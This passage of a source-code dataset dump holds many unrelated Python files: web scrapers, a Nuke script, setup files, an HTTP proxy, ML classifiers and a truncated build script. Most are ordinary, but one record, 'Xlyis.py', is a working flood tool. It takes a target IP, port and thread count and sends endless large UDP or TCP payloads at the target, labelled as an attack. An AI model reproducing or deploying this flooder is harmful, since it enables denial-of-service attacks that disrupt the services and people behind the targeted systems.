sess.run(total_loss))\n\t\t# save temp model \n\t\tif step % 1000 == 0:\n\t\t\tsaver.save(sess, model_path, global_step=step)\n\n\t# evaluate performance with test data\n\tevaluate(sess, X, Y)\n\n\t# save final model\n\tsaver.save(sess, model_path, global_step=training_steps)\n\n\t# stop threads\n\tcoord.request_stop()\n\tcoord.join(threads)\n\t\n\t# close 
session\n\tsess.close()\n\n\n\n\n","sub_path":"2017.01.23-NeuralNetwork/templates/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"214892999","text":"import crawler\nimport database\n\n#Debug\nimport time\ntotal_time = time.time()\n\ndef main():\n #############################\n ##### Define options #####\n #############################\n city = 'Cincinnati'\n state = 'Ohio'\n browser = 'FIREFOX' #FIREFOX or CHROME. Havent tested with Chrome yet\n headless = False #Open the browser in headless mode = True/False\n implicitly_wait = 20 #Seconds to wait implicitly if not explicitly set\n database_file = r'data/pythonsqlite.db'\n\n #############################\n ##### Database Setup ####\n #############################\n #Create empty database with auction and auction_items table\n database.setup_database(database_file)\n connection = database.create_connection(database_file)\n\n #############################\n ###### Web Scraping ######\n #############################\n #Driver setup\n driver,wait5,wait_halfsec = crawler.setup_driver(headless,browser,implicitly_wait)\n\n #Get all auctions\n all_auctions = crawler.find_all_auctions_by_city(driver,wait5,city,state)\n\n #Add items to all auctions\n crawler.add_items_to_all_auctions(driver,wait5,wait_halfsec,all_auctions,connection)\n\n #############################\n ##### Cleanup #####\n #############################\n connection.close()\n crawler.clean_up(driver)\n\n #Debug\n print(\"--- %s seconds ---\" % (time.time() - total_time))\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception as e:\n print(e)\n print(\"Failed to complete the crawl, auctions and items will remain in the DB until cleared\")","sub_path":"conductor.py","file_name":"conductor.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"15274262","text":"#!/usr/bin/env python\r\n#\r\n#----------------------------------------------------------------\r\n# Name: ParameterReplace.py\r\n# Version: 1.0\r\n# Purpose: Modify one parameter of similar named nodes\r\n#\r\n# Author: Christian Schulze\r\n# Email: mail@christian-schulze.eu\r\n#\r\n# Created: 2011/07/19\r\n# Copyright (C) 2011 Christian Schulze\r\n#----------------------------------------------------------------\r\n\r\n\r\nimport nukescripts\r\n\r\nif nuke.env[\"gui\"]:\r\n class ParameterReplace( nukescripts.PythonPanel ):\r\n def __init__( self ):\r\n nukescripts.PythonPanel.__init__( self, \"Parameter Replace\" )\r\n self.nodenames = nuke.String_Knob( \"nodenames\", \"Node Names:\" )\r\n self.nodenames.setValue( 'Transform' )\r\n self.addKnob( self.nodenames )\r\n self.parameter = nuke.String_Knob( \"parameter\", \"Parameter:\" )\r\n self.parameter.setValue( 'scale' )\r\n self.addKnob( self.parameter )\r\n self.istart = nuke.Int_Knob( \"istart\", \"Index Start:\" )\r\n self.istart.setValue( 1 )\r\n self.addKnob( self.istart )\r\n self.iend = nuke.Int_Knob( \"iend\", \"Index End:\" )\r\n self.iend.setValue( 10 )\r\n self.addKnob( self.iend )\r\n self.xfactor = nuke.Double_Knob( \"xfactor\", \"Factor X:\" )\r\n self.xfactor.setValue( 1 )\r\n self.xfactor.setRange( -10 , 10 )\r\n self.addKnob( self.xfactor )\r\n self.yfactor = nuke.Double_Knob( \"yfactor\", \"Factor Y:\" )\r\n self.yfactor.setValue( 1 )\r\n self.yfactor.setRange( -10 , 10 )\r\n self.addKnob( 
self.yfactor )\r\n self.xadd = nuke.Double_Knob( \"xadd\", \"Add X:\" )\r\n self.xadd.setValue( 0 )\r\n self.xadd.setRange( -100 , 100 )\r\n self.addKnob( self.xadd )\r\n self.yadd = nuke.Double_Knob( \"yadd\", \"Add Y:\" )\r\n self.yadd.setValue( 0 )\r\n self.yadd.setRange( -100 , 100 )\r\n self.addKnob( self.yadd )\r\n\r\n def replace( self ):\r\n nodenames = self.nodenames.value()\r\n parameter = self.parameter.value()\r\n istart = self.istart.value()\r\n iend = self.iend.value()\r\n xfactor = self.xfactor.value()\r\n yfactor = self.yfactor.value()\r\n xadd = self.xadd.value()\r\n yadd = self.yadd.value()\r\n\r\n for i in range( istart , iend + 1 ):\r\n inode = nuke.toNode( nodenames + str(i) )\r\n if inode:\r\n iparamx = inode.knob( parameter ).getValue( 0 )\r\n iparamy = inode.knob( parameter ).getValue( 1 )\r\n if iparamx == iparamy and xfactor == yfactor and xadd == yadd: #only one scale value\r\n inode.knob( parameter ).setValue( iparamx * xfactor + xadd )\r\n else: #separate values for x and y\r\n inode.knob( parameter ).setValue( iparamx * xfactor + xadd , 0 )\r\n inode.knob( parameter ).setValue( iparamy * yfactor + yadd , 1 )\r\n\r\n def showModalDialog( self ):\r\n result = nukescripts.PythonPanel.showModalDialog( self )\r\n if result:\r\n self.replace()\r\n\r\n\r\n ParameterReplace().showModalDialog()\r\n","sub_path":"python-scripts/ParameterReplace.py","file_name":"ParameterReplace.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"608328709","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\nimport os\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nsetup(\n name='screamshotter',\n version='1.1.2',\n author='Mathieu Leplatre',\n author_email='mathieu.leplatre@makina-corpus.com',\n url='https://github.com/makinacorpus/django-screamshot',\n description='Web pages capture server',\n long_description='',\n install_requires=[\n 'django-screamshot',\n 'django>=1.11',\n ],\n packages=find_packages(),\n include_package_data=True,\n classifiers=['Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Programming Language :: Python :: 2.7'],\n)\n","sub_path":"pypi_install_script/screamshotter-1.1.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"48446188","text":"#!/usr/bin/python\n# coding=utf-8\n\nimport os\nfrom shutil import copyfile, move\nfrom os.path import join\n\nimport cv2\n\nfrom get_blurry_res.get_blurry_res import get_blurry_res\n\n\ndef move_by_blurry(src_dir, blurry_dir, clear_dir, blurry_thr):\n \"\"\"\n 根据blurry 移动图片\n :return:\n \"\"\"\n t = cv2.IMWRITE_JPEG_QUALITY\n for im_name in os.listdir(src_dir):\n if im_name.endswith('.jpg'):\n src_path = join(src_dir, im_name)\n bl_res = get_blurry_res(cv2.imread(src_path, cv2.IMREAD_GRAYSCALE))\n if bl_res > blurry_thr:\n dst_path = join(clear_dir, im_name)\n else:\n dst_path = join(blurry_dir, im_name)\n move(src_path, dst_path)\n\n\ndef refresh(src_dir, blurry_dir, clear_dir):\n for fn in os.listdir(blurry_dir):\n move(join(blurry_dir, fn), join(src_dir, fn))\n for fn in os.listdir(clear_dir):\n move(join(clear_dir, fn), join(src_dir, fn))\n\n \ndef make_dir(dir_path):\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n return dir_path\n\n\nif __name__ == 
'__main__':\n src_dir = '/disk_workspace/train_data_for_svm/tgde_samples20191126/C_TGDE_PT'\n blurry_dir = make_dir(join(src_dir, 'blurry'))\n clear_dir = make_dir(join(src_dir, 'clear'))\n blurry_thr = 2\n move_by_blurry(src_dir, blurry_dir, clear_dir, blurry_thr)\n # refresh(src_dir, blurry_dir, clear_dir)\n","sub_path":"opencv_demos/pick_samples/move_img_by_blurry.py","file_name":"move_img_by_blurry.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"133247141","text":"from bs4 import BeautifulSoup as bs\nimport yaml\nimport requests\nfrom datetime import datetime\n\nclass OlympiadaRu():\n def __init__(self, matches):\n self.SERVER = 'https://info.olimpiada.ru'\n self.BASE_URL_CURRENT='https://info.olimpiada.ru/current/page/{}?subject%5B{}%5D=on&class%5B{}%5D=on&dtype%5B{}%5D=on'\n self.BASE_URL_NEXT = 'https://info.olimpiada.ru/events/page/{}?subject%5B{}%5D=on&class%5B{}%5D=on&type%5B{}%5D=on'\n self.HEADERS = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n }\n\n self.NUMBERS = ['first', 'second', 'third', 'forth', 'fifth', 'sixth', 'seventh', 'eighth', 'ninth', 'tenth']\n self.KEYWORDS = ['финал', 'Финал', 'Заключительн', 'заключительн']\n self.TYPEWORDS = ['очная', 'личная', 'конференция', 'заочная', 'все типы']\n\n self.matches = matches\n self.SUBJECTS = matches['subjects-olru']\n self.TYPES = matches['types-olru']\n \n def handle_event(self, row):\n result = {\n 'title': 'Title',\n 'stage': 'selection',\n 'subjects': [],\n 'id': -1,\n 'infourl': None,\n 'date_start': '01.01.1970',\n 'date_end': '01.01.1970',\n 'classes': [0],\n 'link': None\n }\n \n link_raw = row.find_all('td')[1].find('a')\n url = self.SERVER + link_raw['href']\n result['title'] = link_raw.text\n\n result['stage'] = 'selection'\n for keyword in self.KEYWORDS:\n if keyword in result['title']:\n result['stage'] = 'final'\n break\n\n subjects_raw = row.find('div', class_='div_selected_subjects')\n subjects = []\n if subjects_raw != None:\n subjects_spans = subjects_raw.find_all('span')\n for item in subjects_spans:\n subjects.append(item.text)\n else:\n try:\n subjects_raw = row.find('span', class_='span_filtered')\n subjects.append(subjects_raw.text.split(' | ')[2])\n except:\n subjects.append(row.find_all('td')[1].text.split(' | ')[1])\n \n result['subjects'] = subjects\n\n if 'тип' in result['subjects'][0]:\n result['subjects'] = []\n for typeword in self.TYPEWORDS:\n if typeword in result['subjects']:\n subjects.append(typeword)\n \n if len(result['subjects']) == 0:\n result['subjects'].append('Любой предмет')\n\n\n eventID = int(link_raw['href'].split('/')[-1])\n result['id'] = eventID\n result['infourl'] = url\n\n print('='*30)\n print('Parsing event ' + str(eventID) + ', ' + url)\n\n request = requests.get(url, headers=self.HEADERS)\n soup = bs(request.content, 'html.parser', from_encoding='utf-8')\n\n data = soup.find('div', class_='main')\n deadlines_raw = data.find('font')\n result['date_start'] = deadlines_raw.text.split(' - ')[0]\n\n try:\n result['date_end'] = deadlines_raw.text.split(' - ')[1]\n except:\n result['date_end'] = result['date_start']\n info_table = data.find('table', class_='event_info_table')\n info_table_rows = info_table.find_all('tr')\n for item in info_table_rows:\n name = 
item.find_all('td')[0].text\n if name == 'Классы':\n classes_raw = item.find_all('td')[1].text\n if ',' in classes_raw:\n \tclasses_raw = classes_raw.split(',')\n else:\n \tclasses_raw = classes_raw.split('-')\n classes = []\n for i in range(int(classes_raw[0]), int(classes_raw[-1])+1):\n classes.append(i)\n result['classes'] = classes\n elif name == 'Ссылка':\n result['link'] = item.find_all('td')[1].find('a')['href']\n \n # NOTE: deprecated code\n #-- check if this event is new\n #event_day = result['date_start'].split('.')[0]\n #event_month = result['date_start'].split('.')[1]\n #if (event_day == datetime.now().day) and (event_month == datetime.now().month):\n # self.mservice.send_event_notifications(result['subjects'], url)\n return result\n\n\n def get_next_events(self, subject=-1, schclass=-1):\n result = []\n if schclass == -1: schclass='%'\n\n url = self.BASE_URL_NEXT.format(1, self.SUBJECTS[str(subject)], schclass, self.TYPES['-1'])\n\n # make request\n session = requests.Session()\n request = session.get(url, headers=self.HEADERS)\n\n if request.status_code == 200:\n soup = bs(request.content, 'html.parser', from_encoding='utf-8')\n elements = []\n for i in range(10):\n try:\n ul = soup.find('ul', class_=self.NUMBERS[i])\n elements += ul.find_all('li')\n except:\n pass \n if len(elements) == 0:\n return result\n for item in elements:\n if item.find('table') != None:\n result.append(self.handle_event(item.find('tr')))\n \n counter = soup.find('ul', {'id': 'counter'})\n\n if counter != None:\n pages_amount = int(counter.find_all('li')[-2].find('a').text)\n for i in range(2, pages_amount+1):\n url = self.BASE_URL_NEXT.format(i, self.SUBJECTS[str(subject)], schclass, self.TYPES['-1'])\n request = session.get(url, headers=self.HEADERS)\n soup = bs(request.content, 'html.parser', from_encoding='utf-8')\n rows = []\n elements = []\n for i in range(10):\n try:\n ul = soup.find('ul', class_=self.NUMBERS[i])\n elements += ul.find_all('li')\n except:\n pass\n for item in elements:\n if item.find('table') != None:\n rows.append(item.find('tr'))\n for row in rows:\n result.append(self.handle_event(row))\n return result\n \n\n\n def get_current_events(self, subject=-1, schclass=-1, oltype=-1):\n result = []\n if schclass == -1: schclass = '%'\n\n url = self.BASE_URL_CURRENT.format(1, self.SUBJECTS[str(subject)], schclass, self.TYPES[str(oltype)])\n\n # make request\n session = requests.Session()\n request = session.get(url, headers=self.HEADERS)\n\n if request.status_code == 200:\n soup = bs(request.content, 'html.parser', from_encoding='utf-8')\n table = soup.find('table', {'style': 'margin-left:40px'})\n rows = table.find_all('tr')\n if len(rows) == 0:\n return result\n for row in rows:\n result.append(self.handle_event(row))\n\n counter = soup.find('ul', {'id': 'counter'})\n if counter != None:\n pages_amount = int(counter.find_all('li')[-2].find('a').text)\n for i in range(2, pages_amount+1):\n url = self.BASE_URL_CURRENT.format(i, self.SUBJECTS[str(subject)], schclass, self.TYPES[str(oltype)])\n request = session.get(url, headers=self.HEADERS)\n soup = bs(request.content, 'html.parser', from_encoding='utf-8')\n table = soup.find('table', {'style': 'margin-left:40px'})\n rows = table.find_all('tr')\n for row in rows:\n result.append(self.handle_event(row))\n\n session.close()\n return result","sub_path":"src/parser/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":8142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 
+{"seq_id":"45589672","text":"#!/usr/bin/env python\n\nimport sys\nimport logging\nimport threading\nimport BaseHTTPServer\n\nfrom LoggingProxyHTTPHandler import LoggingProxyHTTPHandler\n\nclass ThreadedHTTPServer(BaseHTTPServer.HTTPServer):\n def process_request(self, request, client_address):\n thread = threading.Thread(target=self.__new_request, args=(self.RequestHandlerClass, request, client_address, self))\n thread.start()\n def __new_request(self, handlerClass, request, address, server):\n handlerClass(request, address, server)\n self.shutdown_request(request)\n\n#server = ThreadedHTTPServer(('', 80), Handler)\n#server.serve_forever()\n\ndef main(args):\n try:\n port = int(args[1])\n except IndexError:\n port = 8000\n server_address = ('', port)\n\n # Create logger\n logger = logging.getLogger('http proxy')\n logger.setLevel(logging.DEBUG)\n # create file handler which logs even debug messages\n fh = logging.FileHandler('proxy.log')\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n #ch = logging.StreamHandler()\n #ch.setLevel(logging.ERROR)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('=' * 78 + '\\n%(asctime)s - %(threadName)s - %(name)s - %(levelname)s\\n' + '=' * 78 + '\\n%(message)s')\n #ch.setFormatter(formatter)\n fh.setFormatter(formatter)\n # add the handlers to logger\n #logger.addHandler(ch)\n logger.addHandler(fh)\n\n httpd = ThreadedHTTPServer(server_address, LoggingProxyHTTPHandler)\n httpd.serve_forever()\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n","sub_path":"proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"145177406","text":"import numpy as np\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom sklearn.utils.validation import check_X_y, check_array, check_is_fitted\nfrom RandomNumberGenerator import RandomNumberGenerator\nfrom sklearn.base import clone\n\nclass RandomPatches(BaseEstimator, ClassifierMixin):\n \"\"\"\n Implementacja random patches\n\n Parameters\n ----------\n base_estimator : base_estimator (Default = None)\n Deklaracja klasyfikatora bazowego\n\n n_estimators : int (Default = 10)\n Liczba klasyfikatorów\n \n random_state : int (Default = None)\n Ziarno losowe\n \n subset_size : int (Default = 50)\n Ilość wzorców w pojedyńczym bagu\n \n \n \"\"\"\n def __init__(self, base_estimator = None, n_estimators = 10, random_state = None, subset_size = 50):\n self.base_estimator = base_estimator\n self.n_estimators = n_estimators\n self.random_state = random_state\n self.subset_size = subset_size\n \n def fit(self, X, y):\n X, y = check_X_y(X, y)\n self.classes_ = np.unique(y)\n self.X_, self.y_ = X, y\n if not hasattr(self, \"ensemble_\"):\n self.ensemble_ = []\n \n balance_ratio = np.sum(self.y_)/len(self.y_)\n dataset = self.X_\n dataset = np.append(dataset, self.y_, axis=1)\n \n for base_clf in range(self.n_estimators):\n subset = np.empty((0,self.X_.shape[1]+1))\n \n \n feature_subspace_size = RandomGenerator.nextInt(1, self.X_.shape[1])\n Subspace = np.empty((self.X_.shape[0],0))\n \n for feature in range(feature_subspace_size):\n Subspace = np.append(Subspace, np.reshape(self.X_[:, RandomGenerator.nextInt(0, feature_subspace_size - 1) ], (self.X_.shape[0],1)), axis=1)\n \n for sample in range(subset_size):\n draw_index = np.random.randint(0, len(self.X_))\n random_sample = dataset[draw_index]\n \n if sample == 0:\n subset = 
np.append(subset, random_sample, axis = 0)\n continue\n if np.sum(subset[:, -1])/len(subset) > balance_ratio:\n if random_sample[-1] == 0:\n subset = np.append(subset, random_sample, axis = 0)\n else:\n while(random_sample[-1] != 0):\n draw_index = np.random.randint(0, len(self.X_))\n random_sample = dataset[draw_index]\n subset = np.append(subset, random_sample, axis = 0) \n \n else:\n if random_sample[-1] == 1:\n subset = np.append(subset, random_sample, axis = 0)\n else:\n while(random_sample[-1] != 1):\n draw_index = np.random.randint(0, len(self.X_))\n random_sample = dataset[draw_index]\n subset = np.append(subset, random_sample, axis = 0)\n \n X = dataset[:, :-1]\n y = dataset[:, -1].astype(int)\n \n model = clone(self.base_estimator).fit(X, y)\n self.ensemble_.append(model)\n \n \n \n \n return self\n \n def predict(self, X):\n y_pred = [] \n \n for x_query in X:\n votes = []\n \n for Clf in self.ensemble_:\n votes.append(Clf.predict(x_query.reshape(1, -1)))\n \n if np.sum(votes) / self.n_estimators > 0.5:\n y_pred.append(1)\n \n else:\n y_pred.append(0)\n \n \n return y_pred","sub_path":"RandomPatches.py","file_name":"RandomPatches.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"108022134","text":"#!/usr/bin/env python3\r\n#Code by Xlyis\r\nimport random\r\nimport socket\r\nimport threading\r\n\r\nip = str(input(\"IP>\"))\r\nport = int(input(\"PORT>\"))\r\nchoice = str(input(\"METHOD>\"))\r\ntimes = int(input(\"BYTES>\"))\r\nthreads = int(input(\"THREADS>\"))\r\ndef run():\r\n\tdata = random._urandom(65503)\r\n\ti = random.choice((\"\",\"\",\"\"))\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\t\t\taddr = (str(ip),int(port))\r\n\t\t\tfor x in range(times):\r\n\t\t\t\ts.sendto(data,addr)\r\n\t\t\tprint(i +\"Attack To %s:%s BY LNVRH\"%(ip,port))\r\n\t\texcept:\r\n\t\t\tprint(\"[!] 
Error!!!\")\r\n\r\ndef run2():\r\n\tdata = random._urandom(65500)\r\n\ti = random.choice((\"\",\"\",\"\"))\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\t\ts.connect((ip,port))\r\n\t\t\ts.send(data)\r\n\t\t\tfor x in range(times):\r\n\t\t\t\ts.send(data)\r\n\t\t\tprint(i +\"Attack To %s:%s BY LNVRH\"%(ip,port))\r\n\t\texcept:\r\n\t\t\ts.close()\r\n\t\t\tprint(\"[*] Error\")\r\n\r\nfor tcp in range(threads):\r\n\tif choice == 'tcp':\r\n\t\tth = threading.Thread(target = run)\r\n\t\tth.start()\r\n\telse:\r\n\t\tth = threading.Thread(target = run2)\r\n\t\tth.start()","sub_path":"Xlyis.py","file_name":"Xlyis.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"653360739","text":"from ez_setup import use_setuptools\nuse_setuptools()\n\nfrom setuptools import setup, find_packages\nREADME = open('README.txt').read()\n\nversion = '0.1'\n\nsetup(name='Products.rpcauth',\n version = version,\n description = \"Authentication queries to Zope over XML-RPC\",\n long_description = README,\n classifiers=[\n \"Programming Language :: Python\",\n ],\n keywords = '',\n author = 'Agendaless Consulting, Inc.',\n author_email='mailto:tseaver@agendaless.com',\n license='ZPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['Products'],\n include_package_data=True,\n zip_safe=False,\n test_suite=\"Products.rpcauth.tests\",\n tests_require = [\n #'repoze.who',\n ],\n install_requires=[\n 'setuptools',\n 'Products.PluggableAuthService',\n ],\n )\n","sub_path":"pypi_install_script/Products.rpcauth-0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"507200797","text":"#!/usr/bin/env python3\n\n\"\"\"\nFile: classify_gender.py\n------------------------\nScript for classifying gender using face embeddings.\n\nExample #1: Single\n------------------\n\n in_path: my_output_dir\n out_path: my_output_dir\n\n where 'my_output_dir' contains 'embeddings.json'\n\n outputs\n\n my_output_dir/\n └── genders.json\n\n\nExample #2: Batch\n-----------------\n\n in_path: my_output_dir\n out_path: my_output_dir\n \n where 'my_output_dir' contains video output subdirectories\n\n outputs \n\n my_output_dir/\n ├── my_video1\n │   └── genders.json\n └── my_video2\n    └── genders.json\n\n\"\"\"\n\nimport argparse\nfrom multiprocessing import Pool\nimport os\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn.neighbors import KNeighborsClassifier\n\nfrom util.utils import save_json, load_json, get_base_name\nfrom util.consts import OUTFILE_EMBEDS, OUTFILE_GENDERS\n\nGENDER_TRAIN_X_FILE = 'gender_model/train_X.npy'\nGENDER_TRAIN_Y_FILE = 'gender_model/train_y.npy'\nKNN_K = 7\n\ntrain_X = np.load(GENDER_TRAIN_X_FILE)\ntrain_y = np.load(GENDER_TRAIN_Y_FILE)\nclf = KNeighborsClassifier(KNN_K)\nclf.fit(train_X, train_y)\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('in_path', type=str,\n help='path to directory of video outputs')\n parser.add_argument('out_path', type=str,\n help='path to output directory')\n parser.add_argument('-f', '--force', action='store_true',\n help='force overwrite existing output')\n parser.add_argument('-s', '--single', action='store_true', \n help='single video (as opposed to batch)')\n return parser.parse_args()\n\n\ndef main(in_path, out_path, force=False, single=False):\n # 
Check whether input is single or batch\n if single:\n if not os.path.isdir(out_path):\n os.makedirs(out_path)\n\n pbar = tqdm(total=1, desc='Classifying genders', unit='video')\n embeds_path = os.path.join(in_path, OUTFILE_EMBEDS)\n if not os.path.exists(embeds_path):\n print('No face embeddings available, skipping gender classification')\n pbar.update()\n return\n\n genders_outpath = os.path.join(out_path, OUTFILE_GENDERS)\n if force or not os.path.exists(genders_outpath):\n process_single(embeds_path, genders_outpath)\n \n pbar.update()\n return\n else:\n video_names = list(os.listdir(in_path))\n out_paths = [os.path.join(out_path, name) for name in video_names]\n \n for p in out_paths:\n if not os.path.isdir(p):\n os.makedirs(p)\n \n with Pool() as workers, tqdm(\n total=len(video_names), desc='Classifying genders', unit='video'\n ) as pbar:\n for video_name, output_dir in zip(video_names, out_paths):\n embeds_path = os.path.join(in_path, video_name, OUTFILE_EMBEDS)\n genders_outpath = os.path.join(output_dir, OUTFILE_GENDERS)\n if force or not os.path.exists(genders_outpath):\n workers.apply_async(\n process_single,\n args=(embeds_path, genders_outpath),\n callback=lambda x: pbar.update())\n else:\n pbar.update()\n\n workers.close()\n workers.join()\n\n\ndef process_single(in_file, out_file):\n # Load the detected faces and embeddings and run the classifier\n result = [(face_id, predict_gender(embed), predict_gender_score(embed))\n for face_id, embed in load_json(in_file)]\n\n save_json(result, out_file)\n\n\ndef predict_gender(x):\n return 'F' if clf.predict([x]) == 1 else 'M'\n\n\ndef predict_gender_score(x):\n # FIXME: this was not tested. Need to check if this is sane\n return max(clf.predict_proba([x])[0])\n\n\nif __name__ == '__main__':\n main(**vars(get_args()))\n","sub_path":"components/classify_gender.py","file_name":"classify_gender.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"270766255","text":"import zeep\n\n\nclient = zeep.Client(\n wsdl='http://localhost:8080/webservices/chelyabinsk_household_info.wsdl'\n)\n\nticket_id = '551989'\n\nresult = client.service.getResultRequest(\n Message={\n 'Sender': {\n 'Code': 'testcode',\n 'Name': 'testname',\n },\n 'Recipient': {\n 'Code': 'ISMV01001',\n 'Name': 'test',\n },\n 'Originator': {\n 'Code': 'RRTR01001',\n 'Name': 'test',\n },\n 'ServiceName': 'test_service_name',\n 'TypeCode': 'test_type',\n 'Status': 'REQUEST',\n 'Date': '2017-11-27T06:21:51.063+03:00',\n 'ExchangeType': 2,\n 'CaseNumber': '74/011/201/2017-2689',\n },\n MessageData={\n 'AppData': {\n 'ApplicationData': {\n 'getResultRequest': {\n 'ticketId': ticket_id\n },\n },\n },\n },\n)\n\nprint(result.AppData.ApplicationData.getResultResponse)\n","sub_path":"success_result.py","file_name":"success_result.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"313237136","text":"#!/usr/bin/env python3\n\nimport requests, json\nfrom pyarubacentral import auth\n\ndef get_networks(sessiondata):\n url = \"https://app1-apigw.central.arubanetworks.com/monitoring/v1/networks\"\n payload = {'access_token': sessiondata['access_token']}\n headers = {\"Accept\": \"application/json\"}\n\n response = requests.get(url, params=payload, headers=headers)\n\n return 
response.json()\n","sub_path":"pyarubacentral/get_networks.py","file_name":"get_networks.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"200960349","text":"# -*- coding:utf-8 -*-\n''''''\n\n\n'''\n\n聊天室\n\n'''\n\nimport socket,time\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nuserSock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nsendAddress = ('127.0.0.1',8080)\nrecAddress = ('',8899)\n\nuserSock1.bind(recAddress)\n\nwhile True:\n\n sendMsg = raw_input('Input Msg:')\n\n userSock1.sendto(sendMsg.encode('utf-8'), sendAddress)\n\n user1RecMsg = userSock1.recvfrom(1024)\n\n print('%s : %s' % (time.ctime(), user1RecMsg))\n\n\nuserSock1.close()","sub_path":"Exercise/网络编程/udp/聊天室.py","file_name":"聊天室.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291908853","text":"\nmaand = int(input('Maand: '))\n\ndef seizoen(maand):\n if maand >= 0 and maand <=2:\n antwoord = 'Winter'\n elif maand >= 3 and maand <=5:\n antwoord = 'Lente'\n elif maand >= 6 and maand <=8:\n antwoord = 'Zomer'\n elif maand >= 9 and maand <=11:\n antwoord = 'Herfst'\n else:\n antwoord = 'Error'\n return antwoord\n\nprint(seizoen(maand))","sub_path":"Les6/pe6_1.py","file_name":"pe6_1.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"222303876","text":"def init(job):\n from JumpScale.baselib.atyourservice81.AtYourServiceBuild import ensure_container\n ensure_container(job.service, root=False)\n\n\ndef install(job):\n from JumpScale.baselib.atyourservice81.AtYourServiceBuild import build\n\n def build_func(cuisine):\n service = job.service\n cuisine.tools.sandbox.cleanup()\n\n\n js_script = r\"\"\"\n from JumpScale import j\n paths = []\n paths.append(\"/usr/lib/python3/dist-packages\")\n paths.append(\"/usr/lib/python3.5/\")\n paths.append(\"/usr/local/lib/python3.5/dist-packages\")\n base_dir = j.tools.cuisine.local.core.dir_paths['base']\n dest = j.sal.fs.joinPaths(base_dir, 'lib')\n excludeFileRegex = [\"-tk/\", \"/lib2to3\", \"-34m-\", \".egg-info\", \"lsb_release\"]\n excludeDirRegex = [\"/JumpScale\", \"\\.dist-info\", \"config-x86_64-linux-gnu\", \"pygtk\"]\n for path in paths:\n j.tools.sandboxer.copyTo(path, dest, excludeFileRegex=excludeFileRegex, excludeDirRegex=excludeDirRegex)\n j.tools.sandboxer.copyTo('/usr/local/bin/', '%s/bin/' % base_dir, excludeFileRegex=excludeFileRegex, excludeDirRegex=excludeDirRegex)\n if not j.sal.fs.exists(\"%s/bin/python\" % base_dir):\n j.sal.fs.symlink(\"%s/bin/python3\" % base_dir, \"%s/bin/python3.5\" % base_dir, overwriteTarget=True)\n j.tools.sandboxer.sandboxLibs(\"%s/lib\" % base_dir, recursive=True)\n j.tools.sandboxer.sandboxLibs(\"%s/bin\" % base_dir, recursive=True)\n \"\"\"\n cuisine.core.execute_jumpscript(js_script)\n\n sshkey = service.producers['sshkey'][0]\n cuisine.core.file_write(\"/root/.ssh/store_rsa\", sshkey.model.data.keyPriv)\n cuisine.core.file_attribs('/root/.ssh/store_rsa', mode='0600')\n\n upload = r\"\"\"\n from JumpScale import j\n j.do.loadSSHKeys('/root/.ssh/store_rsa')\n stor_exec = j.tools.executor.getSSHBased('{store_addr}')\n stor_cuisine = j.tools.cuisine.get(stor_exec)\n ### upload to stor\n sp = 